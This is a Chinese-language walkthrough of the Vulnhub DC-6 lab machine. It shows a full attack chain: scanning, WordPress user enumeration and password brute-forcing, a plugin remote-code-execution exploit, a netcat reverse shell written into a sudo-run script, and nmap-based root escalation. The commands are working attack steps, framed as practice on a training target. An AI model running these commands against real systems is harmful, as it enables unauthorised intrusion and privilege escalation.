DC-6靶机渗透测试详细教程

1. 靶机信息与初始扫描

DC-6是Vulnhub提供的一个WordPress相关的渗透测试靶机。首先我们需要发现目标IP地址：

nmap -sP 192.168.10.0/24

发现靶机IP后(假设为192.168.10.129)，进行详细端口扫描：

nmap -sV -p 1-65535 -A 192.168.10.129

扫描结果显示开放了22(SSH)和80(HTTP)端口。

2. WordPress站点访问配置

访问80端口时发现URL被重定向到"wordy"，需要在hosts文件中添加解析：

echo "192.168.10.129 wordy" >> /etc/hosts

3. 目录与WordPress信息收集

使用御剑等工具扫描目录结构，发现是WordPress站点。

使用WPScan进行WordPress专项扫描：

wpscan --url wordy --enumerate u

4. 密码爆破

尝试使用rockyou.txt字典爆破：

wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt

根据Vulnhub提示，优化字典：

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url wordy --enumerate u -P /root/passwords.txt

成功获取到凭据：

• 用户名：mark
• 密码：helpdesk01

5. WordPress后台漏洞利用

登录WordPress后台后，发现"Activity on Wordy"插件存在远程代码执行漏洞。

利用步骤：

1. 打开Burp Suite设置代理
2. 拦截相关请求
3. 发送到重放模块(Repeater)
4. Kali开启监听端口
5. 构造恶意请求执行代码

成功获取Webshell。

6. 横向移动

在系统中搜寻敏感信息，发现graham用户的密码。

查看graham用户的sudo权限：

sudo -l

结果显示graham可以以jens用户权限执行backups.sh脚本。

7. 权限提升至jens用户

创建反弹shell脚本：

echo "nc -e /bin/bash 192.168.10.155 8888" > backups.sh

Kali端监听8888端口：

nc -lvnp 8888

以jens用户执行脚本：

sudo -u jens ./backups.sh

8. 最终提权至root

发现jens用户可以以root权限执行nmap，利用nmap提权：

旧版本nmap提权方法：

nmap --interactive
!sh

新版本nmap提权方法：

echo 'os.execute("/bin/sh")' > /tmp/TF
sudo nmap --script=/tmp/TF

成功获取root权限，完成整个渗透测试过程。

关键点总结

1. 主机发现与端口扫描是基础
2. WordPress站点需要关注插件漏洞
3. 密码爆破时注意靶机提示优化字典
4. 横向移动时要仔细检查各用户权限
5. nmap的sudo权限是常见提权方式
6. 不同版本nmap的提权方法有所不同

通过以上步骤，可以系统性地完成DC-6靶机的渗透测试，掌握WordPress站点渗透和Linux系统提权的关键技巧。